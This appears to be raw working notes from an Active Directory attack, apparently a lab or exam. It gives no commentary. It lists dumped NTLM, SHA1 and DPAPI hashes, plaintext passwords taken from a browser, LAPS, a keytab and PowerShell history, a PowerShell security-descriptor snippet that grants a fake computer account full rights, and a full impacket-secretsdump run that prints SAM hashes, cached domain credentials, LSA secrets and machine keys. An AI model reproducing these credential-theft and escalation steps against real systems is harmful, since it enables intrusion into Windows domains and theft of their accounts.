Username : appmanager
* Domain : IT
* NTLM : 2c5d4678b83e5de26dc0338a0fcf6245
* SHA1 : 18cb4d7cb7e5aa891ef9f4f44c846a491999ede4
* DPAPI : cc49271d0c4e173c4acdabba341b7e69
Got creds from edge
UserName Resource Password
-------- -------- --------
root <http://192.168.4.111/> BugTrackerL0g1n
itemployees <http://192.168.4.111/> ReadOnlyAccess
LAPS On IT-APPSRV01
username: Administrator
password: (4E01+)$-L[3m9
Got sqlsvc hash from keytab file.
username: sqlsvc
hash: 7782d820e5e5952b20b77a2240a03bbc
I’m Cooked No waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaay
Found creds in powershell history
powershell -ep bypass $passwd = ConvertTo-SecureString "Vend0r'sDatabaseSecret"-AsPlainText -Force
powershell -ep bypass $passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses "192.168.4.2", "192.168.250.1"
examuser
Id70+#1C+;33{/
00000003] Primary
* Username : techadmin
* Domain : GCBTECH
* NTLM : 85fea8c3730ce6ccce8c52c58854ed8e
* SHA1 : bad0edffa3c5ad6be639ae224ed5f5aee6e261c1
* DPAPI : 9aaaa1e7720c6d06a40fcce718035daf
Fake01 sid
S-1-5-21-1265556501-975517518-3548124796-8101
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1265556501-975517518-3548124796-8101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
msv :
[00000003] Primary
* Username : sqladmin
* Domain : GCBTECH
* NTLM : 41eb70e78aef6778c507773770fcf780
* SHA1 : 1e476b9e69778cafca7a4c45dd44b147438ae0ac
* DPAPI : 914d7e0c9c9d4a9a9d19473d7a9fa6ab
tspkg :
wdigest :
* Username : sqladmin
* Domain : GCBTECH
* Password : (null)
kerberos :
* Username : sqladmin
* Domain : GCBTECH.LOCAL
* Password : P@ssforDBServer1
┌──(remo㉿Remo)-[~/Server]
└─$ impacket-secretsdump gcbtech.local/'sqladmin':'P@ssforDBServer1'@172.16.11.4
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x98a06e754f0c627c1466a1c3ca55431f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:40927ede7a0c75c55acad0699d36712d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:65c30c7139b564de8357dd82e2e97e40:::
[*] Dumping cached domain logon information (domain/username:hash)
GCBTECH.LOCAL/sqladmin:$DCC2$10240#sqladmin#5a34bb39bce9d48b2bfb84bfbe9792e9: (2025-05-10 10:23:03)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
GCBTECH\\GCBTECH-SQL$:aes256-cts-hmac-sha1-96:8ded49b2b4e2d180cfaf1db70b281d7fde3c80dd0a7dd89ee9e4bf7ad1baefed
GCBTECH\\GCBTECH-SQL$:aes128-cts-hmac-sha1-96:5ba855f66c5b84d2fcbbb3ddd24408d4
GCBTECH\\GCBTECH-SQL$:des-cbc-md5:9b3475499ddf6749
GCBTECH\\GCBTECH-SQL$:plain_password_hex:08dc010253bad3bdbe26bb9484e11fd1769db29ade7b2ba98042f9cb485ab5da6d5f7e1aaf0621044a6f93c65f9b83c3c56eba79285689dd275d6e106e9ac480cf130b4315f236242921ccd8b6f162b5ba3a3d29cea344ac25f529de07ed9b60d6bbf636a91321a1a8f5a0888d97beaa762d1ec882cc40c9a201b783ca17690ea1dfe8dab0873151bdc353c829564582ca86211345ca0290839f120ac31343a2f064e880f97609e2b29483b7aa06ef83004f227b23ee724f8bb791882bbbdd4c146432c7210138627b31c6dce701570af84c811f7f7d5c00feba5bea252e97142cd48fb9be44180dc822ceb7883285d6
GCBTECH\\GCBTECH-SQL$:aad3b435b51404eeaad3b435b51404ee:8db46467a82fada77d7140a23689b1bb:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f0e5b87f833bca8a56e5e1e2f89a05b5755808b
dpapi_userkey:0xa6acb9962392c033ca079ba74b32474e6a6531f8
[*] NL$KM
0000 13 CB 6B A7 F5 1E A5 FC 8D 4F 2E 34 6F 4E 41 11 ..k......O.4oNA.
0010 7C D7 16 E5 79 77 1A 95 7A C0 01 65 7B C5 88 60 |...yw..z..e{..`
0020 27 AC 55 FC AD DD 07 2B DC 82 45 7B 4C 65 BA 9F '.U....+..E{Le..
0030 DD 69 9C 69 77 35 49 E8 A1 70 A2 56 D0 F5 8D 67 .i.iw5I..p.V...g
NL$KM:13cb6ba7f51ea5fc8d4f2e346f4e41117cd716e579771a957ac001657bc5886027ac55fcaddd072bdc82457b4c65ba9fdd699c69773549e8a170a256d0f58d67
[*] Cleaning up...
[*] Stopping service RemoteRegistry